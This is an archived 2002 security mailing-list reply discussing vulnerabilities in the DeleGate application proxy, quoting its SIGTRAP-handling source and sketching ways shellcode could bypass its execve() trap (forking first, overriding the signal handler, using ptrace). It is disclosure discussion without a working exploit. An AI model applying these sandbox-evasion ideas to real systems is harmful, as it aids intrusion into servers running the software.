Re: [Global InterSec 2002012101] DeleGate Application Proxy - Multiple Vulnerabilities

From: Tom Parker (tomat_private)
Date: Tue Feb 12 2002 - 02:38:08 PST

Next message: Brian Gallagher: "Re: Authorize.Net Plain Text Login Transmission"

Previous message: Paul A Roberts: "Identix BioLogon 3"
In reply to: Kris Kennaway: "Re: [Global InterSec 2002012101] DeleGate Application Proxy - Multiple Vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Kris

 > These vulnerabilities were publicized several years ago; the
 > developers appear to have made some effort to clean up the code, but
 > given the condition it was in to begin with it's not really any
 > surprise there are many problems remaining.

As stated in the advisory - other vulnerabilities in delegate haven't been
uncommon in the past. However no one seems to of yet stepped out
and outlined the sheer severity and number of them which exist.
Neither has anyone outlined that the work arounds the author introduced
do little or no good toward prevention of the bugs being exploited.

In answer to Kojima Hajime's question:

 > And, delegate has execve(2) trap (-Tx). Can you break it?

Yes - A couple of methods spring to mind..
When an processes calling execve() is being ptrace()'d will send a SIGTRAP
which is caught by the signal handlers in delegate and handled accordingly,

ie:

forkspawn.c:114: if( sig == SIGTRAP ){
forkspawn.c:115: if( lNOEXEC() )
forkspawn.c:116: ptraceKill(pid);
forkspawn.c:117: else ptraceContinue(pid,0);

If we had control of the parent (which we don't) you could either overwrite
the execve trap by adding another (NULL) signal handler for the event in
your shellcode.

However, If I were to have time to write a proof of concept(c) Id attempt
to execute the execve() after fork()'ing in my shellcode. For example:
if (fork () == 0) { execve-shellcode(); }

You can also use ptrace within your shellcode to deceive the watcher (parent)
process, I haven't had time to investigate this technique with delegate 
right now,
the original advisory will be updated with additional information on this when
Ive had time to prove it works ;-)

Regards
Tom Parker

---------------------------------------------------------------------------- 
----------------------
Tom Parker - tomat_private
Global Intersec LLC California +1 888 797 3262
---------------------------------------------------------------------------- 
----------------------
"Stupidity cannot be cured with money or through
education or by legislation. Stupidity is not a sin,
the victim can't help being stupid. But stupidity
is the only universal capital crime; the sentence
is death there is no appeal and execution is
carried out automatically and without pity."
  -Robert Heinlein
---------------------------------------------------------------------------- 
----------------------

Next message: Brian Gallagher: "Re: Authorize.Net Plain Text Login Transmission"
Previous message: Paul A Roberts: "Identix BioLogon 3"
In reply to: Kris Kennaway: "Re: [Global InterSec 2002012101] DeleGate Application Proxy - Multiple Vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Feb 13 2002 - 21:11:51 PST